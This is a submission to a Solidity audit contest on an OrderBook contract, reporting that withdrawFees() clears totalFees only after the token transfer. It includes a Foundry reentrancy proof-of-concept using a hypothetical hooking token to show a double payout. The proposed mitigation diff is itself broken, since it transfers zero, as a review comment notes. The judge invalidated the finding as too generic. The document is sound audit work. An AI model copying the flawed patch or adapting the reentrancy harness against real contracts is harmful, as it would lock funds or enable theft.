OrderBook

First Flight #43
Beginner Friendly / Solidity
100 EXP
Submission Details
Impact: medium
Likelihood: low
Invalid

withdrawFees() doesn't follow the CEI (checks-effects-interactions) pattern.

Root + Impact: the CEI pattern is not followed in withdrawFees(); the external token transfer runs before totalFees is cleared.

Description

  • The withdrawFees() function doesn't follow the CEI pattern: the interaction (iUSDC.safeTransfer) happens before the effect (totalFees = 0).

  • Because the state update comes after the external call, the function is exposed to reentrancy from the token contract for as long as totalFees still holds its old value.

// Root cause in the codebase with @> marks to highlight the relevant section
function withdrawFees(address _to) external onlyOwner {
    if (totalFees == 0) {
        revert InvalidAmount();
    }
    if (_to == address(0)) {
        revert InvalidAddress();
    }
@>  iUSDC.safeTransfer(_to, totalFees); // interaction: external call into the token contract
@>  totalFees = 0;                      // effect: state is cleared only after the call returns
    emit FeesWithdrawn(_to);
}

Risk

Likelihood:

  • onlyOwner makes exploitation unlikely, but not impossible (if ownership is compromised). Reentry also requires iUSDC to be a token whose transfer() calls back into the caller; a standard ERC20 such as USDC has no such hook, so both the owner and the token would have to be hostile.


Impact:

  • If iUSDC were a malicious ERC20 token with a hook in transfer(), it could reenter the contract while totalFees is still stale.

  • On reentry, withdrawFees() sees the pre-transfer value of totalFees and passes the checks again, so the same fee balance can be paid out more than once, up to the contract's iUSDC balance.

Proof of Concept
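The following Foundry test is an added example, not code from the OrderBook repository or from the original submission. It uses a simplified FeeVault stand-in (assumption: same check/transfer/clear ordering as the reported function, with a flag to switch to the CEI ordering), a hypothetical HookToken whose transfer() reenters the vault, and plain transfer() in place of SafeERC20.safeTransfer (which wraps the same call, so the reentrancy surface is the same). Because withdrawFees() is onlyOwner, the token itself is set as the vault owner so that its callback passes the access check; this is exactly the extra precondition that makes the finding hard to exploit in practice.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

interface IToken {
    function transfer(address to, uint256 amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

// Stand-in for the fee-holding part of OrderBook (constructed for this example).
// cei == false reproduces the reported ordering; cei == true applies the fix.
contract FeeVault {
    error NotOwner();
    error InvalidAmount();
    error InvalidAddress();
    event FeesWithdrawn(address indexed to);

    IToken public immutable iUSDC;
    address public immutable owner;
    bool public immutable cei;
    uint256 public totalFees;

    constructor(IToken token, address _owner, bool _cei) {
        iUSDC = token;
        owner = _owner;
        cei = _cei;
    }

    // Simulates fee accrual (the real contract increments totalFees on fills).
    function accrue(uint256 amount) external {
        totalFees += amount;
    }

    function withdrawFees(address _to) external {
        if (msg.sender != owner) revert NotOwner();
        if (totalFees == 0) revert InvalidAmount();
        if (_to == address(0)) revert InvalidAddress();
        if (cei) {
            uint256 amount = totalFees;
            totalFees = 0;                           // effect before interaction
            require(iUSDC.transfer(_to, amount));
        } else {
            require(iUSDC.transfer(_to, totalFees)); // interaction first ...
            totalFees = 0;                           // ... effect after: reentrancy window
        }
        emit FeesWithdrawn(_to);
    }
}

// Hypothetical ERC20-like token whose transfer() reenters the vault once.
// It must be the vault owner for the callback to pass the onlyOwner check.
contract HookToken is IToken {
    mapping(address => uint256) public override balanceOf;
    FeeVault public vault;
    uint256 private depth;

    function setVault(FeeVault v) external { vault = v; }
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }

    function transfer(address to, uint256 amount) external override returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        // try/catch keeps the outer transfer alive when the CEI-ordered vault
        // reverts with InvalidAmount() on the reentrant call.
        if (msg.sender == address(vault) && depth < 1) {
            depth++;
            try vault.withdrawFees(to) {} catch {}
            depth--;
        }
        return true;
    }

    function drain(address to) external { vault.withdrawFees(to); }
}

contract WithdrawFeesReentrancyTest is Test {
    address attacker = makeAddr("attacker");

    function _deploy(bool cei) internal returns (FeeVault vault, HookToken token) {
        token = new HookToken();
        vault = new FeeVault(token, address(token), cei);
        token.setVault(vault);
        token.mint(address(vault), 1_000e6); // vault holds 1000 units (constructed)
        vault.accrue(100e6);                 // of which 100 are fees
    }

    function testReportedOrderingPaysFeesTwice() public {
        (FeeVault vault, HookToken token) = _deploy(false);
        token.drain(attacker);
        assertEq(token.balanceOf(attacker), 200e6); // 100 accrued, 200 paid out
        assertEq(vault.totalFees(), 0);
    }

    function testCeiOrderingPaysFeesOnce() public {
        (FeeVault vault, HookToken token) = _deploy(true);
        token.drain(attacker);
        assertEq(token.balanceOf(attacker), 100e6);
        assertEq(vault.totalFees(), 0);
    }
}
```

Run with `forge test --match-contract WithdrawFeesReentrancyTest`. The first test shows the double payout the finding describes; the second shows that clearing totalFees before the transfer closes the window, because the reentrant call fails the totalFees == 0 check.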

Recommended Mitigation

- iUSDC.safeTransfer(_to, totalFees);
+ totalFees = 0;
+ iUSDC.safeTransfer(_to, totalFees);
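Review bot: this patch sends nothing. After `+ totalFees = 0;` the next line `+ iUSDC.safeTransfer(_to, totalFees);` transfers a zero amount, so the fees stay locked in the contract. Cache the value first: `uint256 amount = totalFees; totalFees = 0; iUSDC.safeTransfer(_to, amount);`. The original `totalFees = 0;` that follows the transfer should also be removed from the patched function, since it becomes a redundant second write.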
Updates

Lead Judging Commences

yeahchibyke Lead Judge about 1 month ago
Submission Judgement Published
Invalidated
Reason: Too generic
